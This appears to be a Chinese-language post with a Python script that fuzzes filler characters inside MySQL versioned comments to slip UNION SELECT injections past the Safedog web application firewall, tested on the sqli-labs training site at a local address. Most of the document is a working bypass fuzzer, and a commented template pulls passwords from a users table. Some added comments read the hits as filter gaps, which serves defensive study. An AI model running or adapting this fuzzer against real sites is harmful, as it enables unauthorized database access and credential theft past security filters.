fuzz方法注入绕过安全狗

以sqli lab 第六关为测试环境
成功bypass
注释里的payload可以成功跑出带表名列名的信息

#encoding = utf8
import requests
from queue import Queue
import threading

# Filler tokens tried between the two SQL keywords of each candidate request.
# fuzz_zs: comment delimiters and operator-like symbols, plus an encoded NUL.
fuzz_zs = [
    '/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|',
    '%00',
]
# fuzz_sz: the empty string and a single space.
fuzz_sz = ['', ' ']
# fuzz_ch: "%0a".."%0j" in order; only a-f form valid percent-escapes, g-j are
# sent as literal text.
fuzz_ch = ["%0" + tail for tail in "abcdefghij"]
# Combined pool, in the order: encoded characters, blanks, symbols.
Fuzz = [*fuzz_ch, *fuzz_sz, *fuzz_zs]
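class fuzz:
    """Queue one request URL per 4-token filler combination and record hits.

    Every URL is ``root`` followed by a ``/*!union<a><b><c><d>select*/``
    fragment, where the four fillers are drawn from the module-level ``Fuzz``
    list. A response counts as a hit when its body contains ``"Dhakkan"`` and
    does not contain ``"error"``; hit URLs are printed and kept in ``s_list``.

    NOTE(review): each hit is a request that reached the application in a
    form the database still parsed, so ``s_list`` reads as a list of filter
    rule gaps. The common factor is the MySQL versioned comment ``/*!...*/``,
    whose content is executed; a filter has to normalise it before matching.
    """

    def __init__(self, root, ThreadNum=5):
        """Store the settings and fill the work queue.

        Args:
            root: Base URL including the ``id`` parameter; every candidate
                fragment is appended to it.
            ThreadNum: Number of worker threads started by ``work``.
        """
        # The previous version ignored both arguments and always used a
        # hard-coded URL and thread count.
        self.root = root
        self.ThreadNum = ThreadNum
        self.headers = {
            # One string: the page extraction had split this literal over
            # three lines, which is a syntax error.
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) '
                          'AppleWebKit/535.20 (KHTML, like Gecko) '
                          'Chrome/19.0.1036.7 Safari/535.20',
            'Referer': 'http://www.camel.com',
            'Cookie': 'whoami=digo8',
        }
        self.task = Queue()
        # len(Fuzz) ** 4 candidates are queued up front.
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp = self.root + "' /*!union" + a + b + c + d + "select*/" + " 1,2,3 --+"
                        # Alternative template kept from the original post
                        # (disabled there as a bare string literal):
                        # exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password /*!from "+a+b+c+d+"users*/--+"
                        self.task.put(exp)
        self.s_list = []

    def visit(self, url):
        """Fetch ``url`` with the fixed headers.

        Returns:
            The response body as text, or ``""`` when the request fails.
        """
        try:
            # A timeout keeps one stalled connection from hanging a worker.
            r = requests.get(url, headers=self.headers, timeout=10)
            ret = r.text
        except requests.RequestException:
            # Only transport errors are treated as "no response"; programming
            # errors and Ctrl-C are no longer swallowed.
            print("Fail to connect...")
            ret = ""
        return ret

    def test_url(self):
        """Worker loop: drain the queue and record URLs whose response is a hit."""
        from queue import Empty

        while True:
            # empty() followed by a blocking get() can hang when another
            # worker takes the last item in between; get_nowait() cannot.
            try:
                url = self.task.get_nowait()
            except Empty:
                return
            ret = self.visit(url)
            if "Dhakkan" in ret and "error" not in ret:
                self.s_list.append(url)
                print(url)

    def work(self):
        """Run ``ThreadNum`` workers over the queue and wait for all of them."""
        # Pass the bound method itself. ``target=self.test_url()`` ran the
        # whole queue in the calling thread and started threads with no target.
        threads = [
            threading.Thread(target=self.test_url)
            for _ in range(self.ThreadNum)
        ]
        for t in threads:
            t.start()
        for t in threads:
            t.join()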
# Script entry point. There is no __main__ guard, so importing this file also
# builds the queue and starts sending requests to the lab host.
obj = fuzz(root="http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()
